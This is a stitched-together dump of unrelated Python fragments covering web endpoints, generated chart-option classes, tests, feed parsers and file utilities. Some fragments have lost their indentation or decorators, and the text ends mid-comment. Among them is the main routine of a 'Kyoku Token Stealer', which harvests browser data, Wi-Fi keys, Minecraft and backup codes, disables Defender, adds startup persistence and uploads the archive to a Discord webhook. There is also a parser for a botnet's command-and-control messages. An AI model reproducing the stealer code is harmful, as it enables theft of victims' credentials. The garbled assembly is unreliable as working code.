print(db_user)
if db_user:
posts = get_posts_by_userid(db=db, user_id=user_id)
else:
posts = get_all_posts(db=db)
if (db_user is None):
raise HTTPException(status_code=404, detail='User not found')
total_posts = count_posts(db=db)
response.headers['X-Total-Posts'] = str(total_posts)
return paginate(posts) |
(help='parse static analysis output and save to disk')
_context
('--run-kind', type=str)
('--branch', type=str)
('--commit-hash', type=str)
('--job-id', type=str)
('--differential-id', type=int)
('--add-feature', type=str, multiple=True)
('--previous-issue-handles', type=Path(exists=True, path_type=pathlib.Path), help='file containing list of issue handles to compare INPUT_FILE to')
('--linemap', type=Path(exists=True), help='json file mapping new locations to old locations')
('--store-unused-models', is_flag=True, help='store pre/post conditions unrelated to an issue')
('--dry-run', is_flag=True)
('input_file', type=Path(exists=True))
def analyze(ctx: Context, run_kind: Optional[str], branch: Optional[str], commit_hash: Optional[str], job_id: Optional[str], differential_id: Optional[int], previous_issue_handles: Optional[pathlib.Path], linemap: Optional[str], store_unused_models: bool, dry_run: bool, input_file: str, add_feature: Optional[List[str]]) -> None:
    """Parse static-analysis output and persist it to the database via the pipeline.

    NOTE(review): the bare tuples/name above are residues of stripped click
    decorators (@click.command / @click.option / @click.argument /
    @click.pass_context) — confirm against VCS before editing.
    """
    summary_blob: Dict[(str, Any)] = {'run_kind': run_kind, 'repository': ctx.repository, 'branch': branch, 'commit_hash': commit_hash, 'old_linemap_file': linemap, 'store_unused_models': store_unused_models}
    # Synthesize a job id from the differential id when none was given.
    if ((job_id is None) and (differential_id is not None)):
        job_id = ('user_input_' + str(differential_id))
    summary_blob['job_id'] = job_id
    if previous_issue_handles:
        summary_blob['previous_issue_handles'] = previous_issue_handles
    # The input may be a directory of result files or a single file.
    if os.path.isdir(input_file):
        analysis_output = AnalysisOutput.from_directory(input_file)
    else:
        analysis_output = AnalysisOutput.from_file(input_file)
    # Parse -> populate DB schema -> tag features -> build models -> trim -> save.
    pipeline_steps = [ctx.parser_class(), CreateDatabase(ctx.database), AddFeatures(add_feature), ModelGenerator(), TrimTraceGraph(), DatabaseSaver(ctx.database, PrimaryKeyGenerator(), dry_run)]
    pipeline = Pipeline(pipeline_steps)
    pipeline.run(analysis_output, summary_blob)
def import_tags(exaile):
    """Prompt for a directory and launch the grouping-tag importer on it."""
    def _on_uris_selected(widget, uris):
        # Open the importer once the user has confirmed a directory.
        GtImporter(exaile, uris).show()
    dialog = dialogs.DirectoryOpenDialog(exaile.gui.main.window, title=_('Select directory to import grouping tags from'))
    dialog.connect('uris-selected', _on_uris_selected)
    dialog.run()
    dialog.destroy()
def obligations_incurred_award(award_count_sub_schedule, award_count_submission, defc_codes):
    """Test fixture: an award with one linked FinancialAccountsByAwards row (DEFC 'M').

    NOTE(review): a @pytest.fixture decorator appears to have been stripped
    during extraction — confirm against VCS.
    """
    award = _normal_award(592)
    baker.make('awards.FinancialAccountsByAwards', award=award, parent_award_id='obligations award', disaster_emergency_fund=DisasterEmergencyFundCode.objects.filter(code='M').first(), submission=SubmissionAttributes.objects.all().first(), transaction_obligated_amount=8)
class TlsCertificatesResponse(ModelComposed):
    """Generated OpenAPI composed model: paginated list of TLS certificates.

    Composed (allOf) of Pagination and TlsCertificatesResponseAllOf.

    NOTE(review): the bare `_property` and `_js_args_to_python_args` lines are
    residues of stripped decorators (@cached_property / @convert_js_args_to_python_args
    in the generator template) — confirm before hand-editing this generated file.
    """
    # No enum-restricted or validated fields on this model.
    allowed_values = {}
    validations = {}
    _property
    def additional_properties_type():
        # Types accepted for undeclared (additional) properties.
        lazy_import()
        return (bool, date, datetime, dict, float, int, list, str, none_type)
    _nullable = False
    _property
    def openapi_types():
        # Declared property name -> accepted type tuple.
        lazy_import()
        return {'links': (PaginationLinks,), 'meta': (PaginationMeta,), 'data': ([TlsCertificateResponseData],)}
    _property
    def discriminator():
        # No polymorphic discriminator on this schema.
        return None
    attribute_map = {'links': 'links', 'meta': 'meta', 'data': 'data'}
    read_only_vars = {}
    _js_args_to_python_args
    def _from_openapi_data(cls, *args, **kwargs):
        """Instantiate from deserialized API data (read-only attrs allowed)."""
        _check_type = kwargs.pop('_check_type', True)
        _spec_property_naming = kwargs.pop('_spec_property_naming', False)
        _path_to_item = kwargs.pop('_path_to_item', ())
        _configuration = kwargs.pop('_configuration', None)
        _visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
        self = super(OpenApiModel, cls).__new__(cls)
        if args:
            raise ApiTypeError(('Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.' % (args, self.__class__.__name__)), path_to_item=_path_to_item, valid_classes=(self.__class__,))
        self._data_store = {}
        self._check_type = _check_type
        self._spec_property_naming = _spec_property_naming
        self._path_to_item = _path_to_item
        self._configuration = _configuration
        self._visited_composed_classes = (_visited_composed_classes + (self.__class__,))
        constant_args = {'_check_type': _check_type, '_path_to_item': _path_to_item, '_spec_property_naming': _spec_property_naming, '_configuration': _configuration, '_visited_composed_classes': self._visited_composed_classes}
        # Distribute kwargs across the composed (allOf) component instances.
        composed_info = validate_get_composed_info(constant_args, kwargs, self)
        self._composed_instances = composed_info[0]
        self._var_name_to_model_instances = composed_info[1]
        self._additional_properties_model_instances = composed_info[2]
        discarded_args = composed_info[3]
        for (var_name, var_value) in kwargs.items():
            if ((var_name in discarded_args) and (self._configuration is not None) and self._configuration.discard_unknown_keys and self._additional_properties_model_instances):
                # Silently drop unknown keys when the configuration says so.
                continue
            setattr(self, var_name, var_value)
        return self
    required_properties = set(['_data_store', '_check_type', '_spec_property_naming', '_path_to_item', '_configuration', '_visited_composed_classes', '_composed_instances', '_var_name_to_model_instances', '_additional_properties_model_instances'])
    _js_args_to_python_args
    def __init__(self, *args, **kwargs):
        """Instantiate from user input (read-only attrs rejected)."""
        _check_type = kwargs.pop('_check_type', True)
        _spec_property_naming = kwargs.pop('_spec_property_naming', False)
        _path_to_item = kwargs.pop('_path_to_item', ())
        _configuration = kwargs.pop('_configuration', None)
        _visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
        if args:
            raise ApiTypeError(('Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.' % (args, self.__class__.__name__)), path_to_item=_path_to_item, valid_classes=(self.__class__,))
        self._data_store = {}
        self._check_type = _check_type
        self._spec_property_naming = _spec_property_naming
        self._path_to_item = _path_to_item
        self._configuration = _configuration
        self._visited_composed_classes = (_visited_composed_classes + (self.__class__,))
        constant_args = {'_check_type': _check_type, '_path_to_item': _path_to_item, '_spec_property_naming': _spec_property_naming, '_configuration': _configuration, '_visited_composed_classes': self._visited_composed_classes}
        composed_info = validate_get_composed_info(constant_args, kwargs, self)
        self._composed_instances = composed_info[0]
        self._var_name_to_model_instances = composed_info[1]
        self._additional_properties_model_instances = composed_info[2]
        discarded_args = composed_info[3]
        for (var_name, var_value) in kwargs.items():
            if ((var_name in discarded_args) and (self._configuration is not None) and self._configuration.discard_unknown_keys and self._additional_properties_model_instances):
                continue
            setattr(self, var_name, var_value)
            if (var_name in self.read_only_vars):
                raise ApiAttributeError(f'`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate class with read only attributes.')
    _property
    def _composed_schemas():
        # allOf composition of the pagination envelope and the data payload.
        lazy_import()
        return {'anyOf': [], 'allOf': [Pagination, TlsCertificatesResponseAllOf], 'oneOf': []}
class LogInstance():
    """One parsed JSON log record with a latency-unit-aware reference length."""

    def __init__(self, info: str, latency_unit: str='word') -> None:
        """Parse *info* (a JSON object string) and expose its fields as attributes."""
        self.info = json.loads(info.strip())
        self.intervals = []
        # Mirror every JSON field as an instance attribute for convenience.
        for field, field_value in self.info.items():
            setattr(self, field, field_value)
        self.index = self.info['index']
        self.reference = self.info.get('reference', '')
        self.latency_unit = latency_unit
        self.source_length = self.info.get('source_length')
        self.finish_prediction = True
        self.metrics = {}
        self.target_spm_model = None

    def set_target_spm_model(self, spm_model):
        """Attach the sentencepiece model required by the 'spm' latency unit."""
        self.target_spm_model = spm_model

    def reference_length(self) -> int:
        """Length of the reference in units of ``self.latency_unit``."""
        unit = self.latency_unit
        if unit == 'word':
            return len(self.reference.split(' '))
        if unit == 'char':
            return len(self.reference.strip())
        if unit == 'spm':
            # 'spm' requires a model set via set_target_spm_model().
            assert (self.target_spm_model is not None)
            return len(self.target_spm_model.encode(self.reference, out_type=str))
        raise NotImplementedError
def get_appointments_to_invoice(patient, company):
    """Collect un-invoiced, non-cancelled Patient Appointments as invoice line dicts."""
    appointments_to_invoice = []
    patient_appointments = frappe.get_list('Patient Appointment', fields='*', filters={'patient': patient.name, 'company': company, 'invoiced': 0, 'status': ['!=', 'Cancelled']}, order_by='appointment_date')
    for appointment in patient_appointments:
        if appointment.procedure_template:
            # Procedure appointment: bill the procedure template only if billable.
            if frappe.db.get_value('Clinical Procedure Template', appointment.procedure_template, 'is_billable'):
                appointments_to_invoice.append({'reference_type': 'Patient Appointment', 'reference_name': appointment.name, 'service': appointment.procedure_template})
        else:
            # Skip free follow-ups already covered by a fee validity.
            if (frappe.db.get_single_value('Healthcare Settings', 'enable_free_follow_ups') and frappe.db.exists('Fee Validity Reference', {'appointment': appointment.name})):
                continue
            practitioner_charge = 0
            income_account = None
            service_item = None
            if appointment.practitioner:
                # Resolve the billing item/rate and income account from the practitioner.
                details = get_appointment_billing_item_and_rate(appointment)
                service_item = details.get('service_item')
                practitioner_charge = details.get('practitioner_charge')
                income_account = get_income_account(appointment.practitioner, appointment.company)
            appointments_to_invoice.append({'reference_type': 'Patient Appointment', 'reference_name': appointment.name, 'service': service_item, 'rate': practitioner_charge, 'income_account': income_account})
    return appointments_to_invoice
def __getattr__(name):
    """Module-level lazy loader (PEP 562): resolve toolkit-backed names on demand."""
    if name in _toolkit_imports:
        from pyface.toolkit import toolkit_object
        resolved = toolkit_object(f'data_view.{_toolkit_imports[name]}:{name}')
        # Cache in module globals so later lookups bypass this hook entirely.
        globals()[name] = resolved
        return resolved
    raise AttributeError(f'module {__name__!r} has no attribute {name!r}')
def test_file_handler_backend_register_next_step_handler(telegram_bot, private_chat, update_type):
    """FileHandlerBackend should persist next-step handlers to disk and reload them."""
    telegram_bot.next_step_backend = FileHandlerBackend(filename='./.handler-saves/step1.save', delay=0.1)
    # NOTE(review): the bare `_bot.message_handler(...)` line looks like the
    # residue of a stripped decorator (likely @telegram_bot.message_handler) —
    # confirm against VCS; as written it is a plain expression, not a decorator.
    _bot.message_handler(commands=['start'])
    def start(message):
        message.text = 'entered start'
        telegram_bot.register_next_step_handler_by_chat_id(message.chat.id, next_handler)
    telegram_bot.process_new_updates([update_type])
    assert (update_type.message.text == 'entered start')
    # Give the delayed background save (delay=0.1s) time to flush to disk.
    time.sleep(0.2)
    assert os.path.exists(telegram_bot.next_step_backend.filename)
    assert (len(telegram_bot.next_step_backend.handlers[private_chat.id]) == 1)
    # Drop the in-memory handlers and reload them from the save file.
    telegram_bot.next_step_backend.handlers = {}
    telegram_bot.next_step_backend.load_handlers()
    assert (len(telegram_bot.next_step_backend.handlers[private_chat.id]) == 1)
    telegram_bot.process_new_updates([update_type])
    assert (update_type.message.text == 'entered next_handler')
    # Handlers are one-shot: consumed after dispatch.
    assert (private_chat.id not in telegram_bot.next_step_backend.handlers)
    time.sleep(0.2)
    if os.path.exists(telegram_bot.next_step_backend.filename):
        os.remove(telegram_bot.next_step_backend.filename)
def find_path(coins, frm, to, amount, online):
    """Find a shortest chain of coin owners from *frm* to *to*.

    Two distinct, online coins are treated as neighbors when the boundary
    between them at some index is flanked by a run of ``amount`` identical
    coins on at least one side. Returns the path as a list of coins
    (including both endpoints) or False when *to* is unreachable.
    """
    # Build the adjacency map from run boundaries in the coins sequence.
    adjacency = {}
    for i in range(amount, len(coins) - amount + 1):
        left, right = coins[i - 1], coins[i]
        if left == right or left not in online or right not in online:
            continue
        if coins[i - amount:i] == [left] * amount:
            adjacency[left] = list(set(adjacency.get(left, []) + [right]))
        if coins[i:i + amount] == [right] * amount:
            adjacency[right] = list(set(adjacency.get(right, []) + [left]))
    # Dijkstra-style search (unit weights, so effectively BFS) from frm.
    parents = {frm: None}
    frontier = [(0, frm)]
    while frontier:
        dist, node = heapq.heappop(frontier)
        for neighbor in adjacency.get(node, []):
            if neighbor in parents:
                continue
            heapq.heappush(frontier, (dist + 1, neighbor))
            parents[neighbor] = node
            if neighbor == to:
                # Reconstruct the path by walking parent links back to frm.
                path = [neighbor]
                while path[0] != frm:
                    path.insert(0, parents[path[0]])
                return path
    return False
class PaymentMethodTests(unittest.TestCase):
    """Unit tests for the QuickBooks PaymentMethod model."""
    def test_unicode(self):
        # str() of a PaymentMethod should be its Name.
        payment_method = PaymentMethod()
        payment_method.Name = 'test'
        self.assertEqual(str(payment_method), 'test')
    def test_valid_object_name(self):
        # The model's qbo_object_name must be recognised by the client.
        obj = PaymentMethod()
        client = QuickBooks()
        result = client.isvalid_object_name(obj.qbo_object_name)
        self.assertTrue(result)
    def test_to_ref(self):
        # to_ref() should carry Name, type and Id into the reference object.
        obj = PaymentMethod()
        obj.Name = 'test'
        obj.Id = 12
        ref = obj.to_ref()
        self.assertEqual(ref.name, 'test')
        self.assertEqual(ref.type, 'PaymentMethod')
        self.assertEqual(ref.value, 12)
def main(webhook: str):
webhook = SyncWebhook.from_url(webhook, session=requests.Session())
threads = [Browsers, Wifi, Minecraft, BackupCodes, killprotector, fakeerror, startup, disable_defender]
username = getpass.getuser()
configcheck(threads)
for func in threads:
process = threading.Thread(target=func, daemon=True)
process.start()
for t in threading.enumerate():
try:
t.join()
except RuntimeError:
continue
zipup()
_file = None
_file = File(f'{localappdata}\Kyoku-Logged-{os.getlogin()}.zip')
content = ''
if __PING__:
if (__PINGTYPE__ == 'everyone'):
content += ''
elif (__PINGTYPE__ == 'here'):
content += ''
webhook.send(content=content, file=_file, avatar_url='', username='Kyoku Token Stealer')
PcInfo()
Discord() |
def get_function_metrics(mh, cfg, tree):
    """Compute enabled per-function metrics (with justifications) for a compilation unit.

    Returns a dict mapping function/script local name to a dict of
    metric -> {measure, limit, reason, tickets}.
    """
    assert isinstance(mh, Message_Handler)
    assert isinstance(cfg, config.Config)
    assert isinstance(tree, Compilation_Unit)
    metrics = {}
    justifications = {}
    class Function_Visitor(AST_Visitor):
        def visit(self, node, n_parent, relation):
            # Only function definitions and script files carry metrics.
            if isinstance(node, Function_Definition):
                name = node.get_local_name()
                n_body = node.n_body
            elif isinstance(node, Script_File):
                name = node.get_local_name()
                n_body = node.n_statements
            else:
                return
            # Measure every metric that the configuration enables.
            metrics[name] = {m: {'measure': MEASURE[m](node), 'limit': None, 'reason': None, 'tickets': set()} for m in config.FUNCTION_METRICS if cfg.metric_enabled(m)}
            justifications[name] = get_justifications(mh, n_body)
            # Emit limit checks (honouring justifications) for each known metric.
            for function_metric in config.FUNCTION_METRICS:
                check_metric(mh, cfg, node.loc(), function_metric, metrics[name], justifications[name])
    tree.visit(None, Function_Visitor(), 'Root')
    return metrics
def action_to_str(act):
    """Render an OpenFlow action object as a user-facing dict.

    The numeric action type is replaced with its user-level name (or
    'UNKNOWN'); SET_FIELD and COPY_FIELD payloads are flattened.
    """
    rendered = act.to_jsondict()[act.__class__.__name__]
    user_type = UTIL.ofp_action_type_to_user(rendered['type'])
    rendered['type'] = user_type if user_type != rendered['type'] else 'UNKNOWN'
    if user_type == 'SET_FIELD':
        # Flatten the OXM TLV into field/mask/value keys.
        oxm = rendered.pop('field')['OXMTlv']
        rendered['field'] = oxm['field']
        rendered['mask'] = oxm['mask']
        rendered['value'] = oxm['value']
    elif user_type == 'COPY_FIELD':
        # Expose the source/destination OXM ids directly.
        oxm_ids = rendered.pop('oxm_ids')
        rendered['src_oxm_id'] = oxm_ids[0]['OFPOxmId']['type']
        rendered['dst_oxm_id'] = oxm_ids[1]['OFPOxmId']['type']
    return rendered
class OptionPlotoptionsPackedbubbleSonificationDefaultinstrumentoptionsMappingNoteduration(Options):
    """Option wrapper for the Highcharts `plotOptions.packedbubble.sonification.
    defaultInstrumentOptions.mapping.noteDuration` group.

    NOTE(review): each accessor is defined twice (getter then setter); the
    original @property / @<name>.setter decorators appear to have been
    stripped during extraction — confirm against the generator output.
    """
    def mapFunction(self):
        # Custom mapping function for the note duration (no default).
        return self._config_get(None)
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)
    def mapTo(self):
        # Data point property the duration is mapped to (no default).
        return self._config_get(None)
    def mapTo(self, text: str):
        self._config(text, js_type=False)
    def max(self):
        # Upper bound of the mapped range (no default).
        return self._config_get(None)
    def max(self, num: float):
        self._config(num, js_type=False)
    def min(self):
        # Lower bound of the mapped range (no default).
        return self._config_get(None)
    def min(self, num: float):
        self._config(num, js_type=False)
    def within(self):
        # What data scope the mapping is computed within (no default).
        return self._config_get(None)
    def within(self, value: Any):
        self._config(value, js_type=False)
def get_baseline_config(prefilter_poses):
    """Return (time_alignment_config, hand_eye_config) tuned for the baseline approach.

    The algorithm name reflects whether pose pre-filtering is enabled.
    """
    time_alignment_config, hand_eye_config = get_basic_config()
    hand_eye_config.algorithm_name = 'baseline_filter' if prefilter_poses else 'baseline_no_filter'
    hand_eye_config.use_baseline_approach = True
    hand_eye_config.prefilter_poses_enabled = prefilter_poses
    hand_eye_config.enable_exhaustive_search = False
    return (time_alignment_config, hand_eye_config)
class OptionChartPanning(Options):
    """Option wrapper for the Highcharts `chart.panning` group.

    NOTE(review): each accessor is defined twice (getter then setter); the
    original @property / @<name>.setter decorators appear to have been
    stripped during extraction — confirm against the generator output.
    """
    def enabled(self):
        # Whether chart panning is enabled (default: False).
        return self._config_get(False)
    def enabled(self, flag: bool):
        self._config(flag, js_type=False)
    def type(self):
        # Pan direction: 'x', 'y' or 'xy' (default: 'x').
        return self._config_get('x')
    def type(self, text: str):
        self._config(text, js_type=False)
def extractSnowbelldotBlogspotCom(item):
    """Map a feed item from snowbelldot.blogspot.com to a release message.

    Returns None for preview/non-chapter items, a release message for a
    recognised tag, or False when no tag matches.
    """
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if 'preview' in item['title'].lower() or not (chp or vol):
        return None
    tagmap = [
        ('Cold King', 'Cold King, the Doctor Fei Is Running Away', 'translated'),
        ('the Doctor Fei Is Running Away', 'Cold King, the Doctor Fei Is Running Away', 'translated'),
        ('Wifes Color is Addicting', "Wife's Color is Addicting", 'translated'),
        ('PRC', 'PRC', 'translated'),
        ('Loiterous', 'Loiterous', 'oel'),
    ]
    for tagname, name, tl_type in tagmap:
        if tagname in item['tags']:
            return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    return False
class OptionPlotoptionsSankeySonificationDefaultinstrumentoptionsMappingTremoloDepth(Options):
    """Option wrapper for the Highcharts `plotOptions.sankey.sonification.
    defaultInstrumentOptions.mapping.tremolo.depth` group.

    NOTE(review): each accessor is defined twice (getter then setter); the
    original @property / @<name>.setter decorators appear to have been
    stripped during extraction — confirm against the generator output.
    """
    def mapFunction(self):
        # Custom mapping function for the tremolo depth (no default).
        return self._config_get(None)
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)
    def mapTo(self):
        # Data point property the depth is mapped to (no default).
        return self._config_get(None)
    def mapTo(self, text: str):
        self._config(text, js_type=False)
    def max(self):
        # Upper bound of the mapped range (no default).
        return self._config_get(None)
    def max(self, num: float):
        self._config(num, js_type=False)
    def min(self):
        # Lower bound of the mapped range (no default).
        return self._config_get(None)
    def min(self, num: float):
        self._config(num, js_type=False)
    def within(self):
        # What data scope the mapping is computed within (no default).
        return self._config_get(None)
    def within(self, value: Any):
        self._config(value, js_type=False)
def extractWwwXinShouSite(item):
    """Map a feed item from www.xinshou.site to a release message.

    Returns None for preview/non-chapter items, a release message for a
    recognised tag, or False when no tag matches.
    """
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if 'preview' in item['title'].lower() or not (chp or vol):
        return None
    tagmap = [
        ('PRC', 'PRC', 'translated'),
        ('Loiterous', 'Loiterous', 'oel'),
    ]
    for tagname, name, tl_type in tagmap:
        if tagname in item['tags']:
            return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    return False
def key_get(obj: Dict[(str, Any)], key: str, default: Any=_KeyGetNoDefault) -> Any:
    """Resolve a dotted *key* path through nested mappings/attribute containers.

    Each path component is looked up first as a mapping key (``.get``) and,
    when the current object is not a mapping, as an attribute. Returns
    *default* when the path is missing and a default was supplied; otherwise
    raises AttributeError.
    """
    # Private sentinel so that a stored value of None is distinguishable
    # from "key missing".
    KeyDoesNotExist = object()

    def _missing() -> Any:
        # Common missing-path handling: default if given, else raise.
        if default is not _KeyGetNoDefault:
            return default
        raise AttributeError(f'{key} does not exist.')

    position = obj
    for component in key.split('.'):
        try:
            position = position.get(component, KeyDoesNotExist)
        except AttributeError:
            # Not a mapping — fall back to attribute access. getattr with a
            # default never raises AttributeError, so no nested guard needed.
            position = getattr(position, component, KeyDoesNotExist)
        # BUG FIX: compare to the sentinel by identity, not equality — `==`
        # could be hijacked by a value's __eq__ (or fail for array-likes).
        # Checking inside the loop also stops traversal at the first miss.
        if position is KeyDoesNotExist:
            return _missing()
    return position
def __plugin_loader(plugin_name):
    """Load a Maya plugin by name with timing logs; no-op when already loaded."""
    logprint('loading {}!'.format(plugin_name))
    if pm.pluginInfo(plugin_name, q=1, loaded=1):
        logprint('Plugin already loaded: {}'.format(plugin_name))
        return
    started = time.time()
    try:
        pm.loadPlugin(plugin_name)
    except RuntimeError:
        # Plugin is not available on this machine; log and carry on.
        logprint('{} not found!'.format(plugin_name))
    else:
        elapsed = time.time() - started
        logprint(('%s loaded! in %0.3f sec' % (plugin_name, elapsed)))
def test_check_multi_point_multi_polyon_outside_op():
    """'eli' with inside=False should remove points outside the polygons.

    Version 1 and version 2 of the operation are expected to differ: v1
    eliminates all four points, v2 keeps one.
    """
    pol = Polygons((SMALL_POLY_INNER + LARGE_POLY_SHIFTED))
    poi = Points([(4.0, 4.0, 0.0), (4.5, 4.0, 0.0), (7.0, 7.0, 0.0), (20.0, 5.0, 0.0)])
    assert (len(poi.dataframe) == 4)
    # Version 1: all points are eliminated.
    poi.operation_polygons(pol, value=1, opname='eli', inside=False, version=1)
    assert (len(poi.dataframe) == 0)
    poi = Points([(4.0, 4.0, 0.0), (4.5, 4.0, 0.0), (7.0, 7.0, 0.0), (20.0, 5.0, 0.0)])
    # Version 2: one point survives.
    poi.operation_polygons(pol, value=1, opname='eli', inside=False, version=2)
    assert (len(poi.dataframe) == 3)
def forceStartAccessibilityServer():
    """Start the iOS accessibility server in the debugged app if it isn't running.

    The UIView selector probe is used as a proxy for "server already active";
    simulator and device need different private-API activation calls.
    """
    already_running = fb.evaluateBooleanExpression('[UIView instancesRespondToSelector:(_accessibilityElementsInContainer:)]')
    if already_running:
        return
    if isRunningInSimulator():
        fb.evaluateEffect('[[UIApplication sharedApplication] accessibilityActivate]')
    else:
        fb.evaluateEffect('[[[UIApplication sharedApplication] _accessibilityBundlePrincipalClass] _accessibilityStartServer]')
# NOTE(review): the bare `.django_db` line is the residue of a stripped
# `@pytest.mark.django_db` decorator — confirm against VCS.
.django_db
def test_get_download_ids(monkeypatch, transaction_type_data, elasticsearch_transaction_index):
    """get_download_ids should yield all matching transaction ids, in order."""
    setup_elasticsearch_test(monkeypatch, elasticsearch_transaction_index)
    results = get_download_ids(['pop tart'], 'transaction_id')
    # Flatten the generator-of-batches into a single id list.
    transaction_ids = list(itertools.chain.from_iterable(results))
    expected_results = [1, 2, 3, 4, 5, 6]
    assert (transaction_ids == expected_results)
def parse_cnc_request(f):
    """Parse one C&C request message from binary stream *f* into a dict.

    Reads a version and message-type header, then type-specific fields.

    NOTE(review): the skipped byte counts (8/28/20/...) look like fixed-size
    struct padding observed on the wire — confirm against the protocol
    definition before changing any offsets.
    """
    data = {}
    data['version'] = unpack('I', f.read(4))[0]
    data['msg_type'] = unpack('I', f.read(4))[0]
    if (data['msg_type'] == 1):
        # Config message: delegate to the config parser, then skip padding.
        data = parse_cnc_request_config(f, data)
        f.read(8)
    elif (data['msg_type'] == 14):
        data['msg_type_decoded'] = 'REPORT_TELNET_LOGIN'
        data['ipaddr'] = socket.inet_ntoa(f.read(4))
        f.read(28)
    elif (data['msg_type'] == 15):
        data = parse_cnc_request_infect(f, data)
        f.read(20)
    elif (data['msg_type'] == 20):
        data['msg_type_decoded'] = 'REPORT_SNIFF'
        data['pkt_len'] = unpack('I', f.read(4))[0]
        f.read(28)
    if (data['msg_type'] == 20):
        # Sniff reports carry an encrypted payload of pkt_len bytes.
        ct = bytearray(f.read(data['pkt_len']))
        data['sniff_payload'] = decrypt_cnc_msg(ct)
    if (data['msg_type'] == 15):
        # Infect reports append two length-prefixed, encrypted strings.
        data['cpu_model_len'] = unpack('I', f.read(4))[0]
        data['cpu_model'] = decrypt_cnc_msg(bytearray(f.read(data['cpu_model_len'])))
        data['processor_len'] = unpack('I', f.read(4))[0]
        data['processor'] = decrypt_cnc_msg(bytearray(f.read(data['processor_len'])))
    return data
class OptionSeriesSankeyStatesHoverHalo(Options):
    """Option wrapper for the Highcharts `series.sankey.states.hover.halo` group.

    NOTE(review): each accessor is defined twice (getter then setter); the
    original @property / @<name>.setter decorators appear to have been
    stripped during extraction — confirm against the generator output.
    """
    def attributes(self):
        # SVG attributes for the halo (no default).
        return self._config_get(None)
    def attributes(self, value: Any):
        self._config(value, js_type=False)
    def opacity(self):
        # Halo opacity (default: 0.25).
        return self._config_get(0.25)
    def opacity(self, num: float):
        self._config(num, js_type=False)
    def size(self):
        # Halo size in pixels (default: 10).
        return self._config_get(10)
    def size(self, num: float):
        self._config(num, js_type=False)
def graphs_with_no_propagation_of_contraction_address_assignment():
    """Test fixture: return (input CFG, expected CFG) for the propagation case
    named by this function.

    Both graphs hold a single basic block; the expected graph differs only in
    the second assignment's right-hand side.
    """
    x = vars('x', 3)
    ptr = vars('ptr', 1, type=Pointer(int32))
    # Input: (int32)x1 = &x0; x2 = (int32)x1
    in_n0 = BasicBlock(0, [_assign(UnaryOperation(OperationType.cast, [x[1]], contraction=True), _addr(x[0])), _assign(x[2], UnaryOperation(OperationType.cast, [x[1]], contraction=True))])
    in_cfg = ControlFlowGraph()
    in_cfg.add_node(in_n0)
    # Expected: the second cast operates on &x0 directly.
    out_cfg = ControlFlowGraph()
    out_cfg.add_node(BasicBlock(0, [_assign(UnaryOperation(OperationType.cast, [x[1]], contraction=True), _addr(x[0])), _assign(x[2], UnaryOperation(OperationType.cast, [_addr(x[0])], contraction=True))]))
    return (in_cfg, out_cfg)
(help={'fmt': 'Build a local report: report, html, json, annotate, html, xml.', 'open_browser': 'Open the coverage report in the web browser (requires --fmt html)'})
def coverage(c, fmt='report', open_browser=False):
    """Invoke task: combine parallel coverage shards and build a report.

    NOTE(review): the bare dict-call line above is the residue of a stripped
    @task(...) decorator — confirm against VCS.
    """
    # Merge any .coverage.* shards left by parallel test runs.
    if any(Path().glob('.coverage.*')):
        _run(c, 'poetry run coverage combine')
    _run(c, f'poetry run coverage {fmt} -i')
    if ((fmt == 'html') and open_browser):
        webbrowser.open(COVERAGE_REPORT.as_uri())
class StagingDirectory():
    """A managed staging directory with safety-checked, relative-path file operations.

    Every destination path is normalized and rejected if it would escape the
    staging root; existing destinations are never overwritten.
    """
    class Error(Exception):
        # Raised for any misuse: non-relative path, clobbered destination, etc.
        pass
    def __init__(self, staging_dir=None):
        # Use the supplied directory, or create a fresh temp dir.
        self._staging = os.path.normpath((staging_dir or tempfile.mkdtemp()))
        safe_mkdir(self._staging)
    def __deepcopy__(self, memo):
        # A deep copy clones the whole tree into a brand-new staging dir.
        other = StagingDirectory()
        memo[id(self)] = other
        other.copytree(self._staging)
        return other
    def _normalize(self, dst):
        """Normalize *dst* and reject absolute or parent-escaping paths."""
        dst = os.path.normpath(dst)
        if (dst.startswith(os.sep) or dst.startswith('..')):
            raise self.Error(("Destination path '%s' is not a relative!" % dst))
        return dst
    def _ensure_parent(self, dst):
        # Create any intermediate directories needed for dst.
        safe_mkdir(os.path.dirname(self.absolute(dst)))
    def _ensure_not_dst(self, dst):
        # Refuse to overwrite an existing destination.
        if self.exists(dst):
            raise self.Error(("Destination path '%s' already exists!" % dst))
    def path(self):
        """Return the staging root path."""
        return self._staging
    def absolute(self, dst=None):
        """Absolute path of relative *dst* inside the staging dir (root if None)."""
        if (dst is None):
            return self._staging
        dst = self._normalize(dst)
        return os.path.normpath(os.path.join(self._staging, dst))
    def delete(self):
        """Remove the whole staging tree."""
        safe_rmtree(self._staging)
    def copy(self, src, dst):
        """Copy external file *src* to relative *dst* (parents created, no clobber)."""
        dst = self._normalize(dst)
        self._ensure_parent(dst)
        self._ensure_not_dst(dst)
        shutil.copy2(src, self.absolute(dst))
    def write(self, data, dst, mode, permissions):
        """Write *data* to relative *dst* using open mode *mode*, then chmod."""
        dst = self._normalize(dst)
        self._ensure_parent(dst)
        self._ensure_not_dst(dst)
        with open(self.absolute(dst), mode) as f:
            f.write(data)
        os.chmod(self.absolute(dst), permissions)
    def postprocess(self, src):
        """Rewrite *src* in place while preserving its timestamps and stat bits.

        NOTE(review): written as a generator yielding (infile, outfile); it was
        almost certainly decorated @contextlib.contextmanager in the original
        source — confirm before calling it directly.
        """
        fpath = self.absolute(src)
        st = os.stat(fpath)
        old_times = (st.st_atime, st.st_mtime)
        with tempfile.NamedTemporaryFile(prefix=(fpath + '.'), mode='w', delete=False) as outf:
            with open(fpath) as inf:
                (yield (inf, outf))
            outf.flush()
            # Restore the original access/modification times and stat, then
            # atomically replace the original file.
            os.utime(outf.name, old_times)
            shutil.copystat(fpath, outf.name)
            os.rename(outf.name, fpath)
    def _resolve_dst_dir(self, dst):
        # When no dst is given, the staging root itself becomes the target —
